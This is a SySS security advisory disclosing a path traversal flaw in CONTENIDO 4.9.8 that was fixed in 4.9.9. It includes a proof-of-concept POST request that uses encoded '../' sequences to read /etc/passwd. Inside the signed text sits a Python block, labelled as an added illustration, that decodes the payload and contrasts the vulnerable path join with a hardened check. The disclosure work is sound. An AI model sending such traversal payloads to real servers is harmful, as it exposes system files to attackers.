-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-012
Product: CONTENIDO
Official Maintainer: four for business AG
Affected Version(s): 4.9.8
Tested Version(s): 4.9.8
Vulnerability Type: Relative Path Traversal (CWE-23)
Risk Level: High
Solution Status: Fixed
Maintainer Notification: 2016-02-18
Solution Date: 2016-02-24
Public Disclosure: 2016-04-18
CVE Reference: Not yet assigned
Author of Advisory: Rainer Boie (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

CONTENIDO is an open source web content management system developed by
four for business AG (see [1]).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

SySS GmbH found that a logged-on back-end user with access to the log
files can conduct a path traversal attack due to insufficient input
validation.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using a fresh installation of CONTENIDO in version 4.9.8 and logged on
as a user with log file access rights, the following HTTP POST request
was used for a relative path traversal attack:

POST /contenido/ajaxmain.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/contenido/main.php?area=system_log&frame=4&contenido=jhh1udcj6jgjlnd7gsrah5jbmrkbuk0t
Content-Length: 58
Cookie: backend=jhh1udcj6jgjlnd7gsrah5jbmrkbuk0t
Connection: keep-alive

ajax=logfilecontent&logfile=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&numberOfLines=100

The content of the file /etc/passwd is then displayed.
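The following is an added illustration, not code from the advisory or from CONTENIDO: it decodes the PoC body above, shows how a naive join of the log directory and the user-supplied name yields /etc/passwd, and contrasts it with a containment check that keeps the resolved path inside the log directory. The log directory path and the request body are constructed for the example; CONTENIDO's real file layout is not given in the advisory.

```python
import os
import urllib.parse
from typing import Optional

# Constructed sample log directory (assumption; not CONTENIDO's real layout).
LOG_DIR = "/var/www/contenido/logs"


def vulnerable_logfile_path(log_dir: str, logfile: str) -> str:
    """CWE-23 pattern: the caller-controlled name is appended to the log
    directory without validation, so '../' segments walk out of it."""
    return os.path.normpath(os.path.join(log_dir, logfile))


def safe_logfile_path(log_dir: str, logfile: str) -> Optional[str]:
    """Return the canonical path of a log file only if it stays inside
    log_dir; return None for traversal, separators or empty names."""
    # A log file name must be a bare basename: no '/', no '.', no '..'.
    if not logfile or logfile != os.path.basename(logfile) or logfile in (".", ".."):
        return None
    base = os.path.realpath(log_dir)
    candidate = os.path.realpath(os.path.join(base, logfile))
    # Containment check on canonical paths, so symlinks cannot escape either.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def decode_logfile_param(body: str) -> str:
    """Extract the URL-decoded 'logfile' parameter from a POST body."""
    params = urllib.parse.parse_qs(body, keep_blank_values=True)
    return params.get("logfile", [""])[0]


# Constructed copy of the PoC body from the advisory (16 encoded '../' steps).
POC_BODY = ("ajax=logfilecontent&logfile=" + "..%2f" * 16 + "etc%2fpasswd"
            + "&numberOfLines=100")

if __name__ == "__main__":
    name = decode_logfile_param(POC_BODY)
    print("vulnerable ->", vulnerable_logfile_path(LOG_DIR, name))  # /etc/passwd
    print("hardened   ->", safe_logfile_path(LOG_DIR, name))        # None
    print("hardened   ->", safe_logfile_path(LOG_DIR, "cms.log"))   # inside LOG_DIR
```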
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

This issue was fixed in version 4.9.9.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2016-02-18: Vulnerability reported to four for business AG
2016-02-24: Maintainer four for business AG released security fix version 4.9.9
2016-04-18: SySS discloses the vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product Web site for CONTENIDO
    http://www.contenido.org
[2] SySS Security Advisory SYSS-2016-012
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-012.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Rainer Boie of SySS GmbH.

E-Mail: rainer.boie (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Rainer_Boie.asc
Key fingerprint = E724 9ECC 7E6F 1008 16AB 1A53 5C12 823D 608D 7AE9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en